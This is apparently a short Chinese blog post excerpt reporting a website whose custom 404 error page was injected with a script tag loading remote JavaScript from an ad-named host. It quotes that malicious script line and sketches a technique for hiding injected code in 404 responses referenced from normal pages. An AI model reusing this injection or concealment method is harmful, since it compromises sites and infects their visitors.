404挂马 + 杂谈 + AD
来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;
细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:
<script src=”http://ad.shitip.com/file/da.js”></script>
貌似最近第三次看到了;
P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm
细想一下,这样是一个不错的挂马选择:
先把挂马代码插入到要返回的404信息里面;
然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;
阅读全文 »
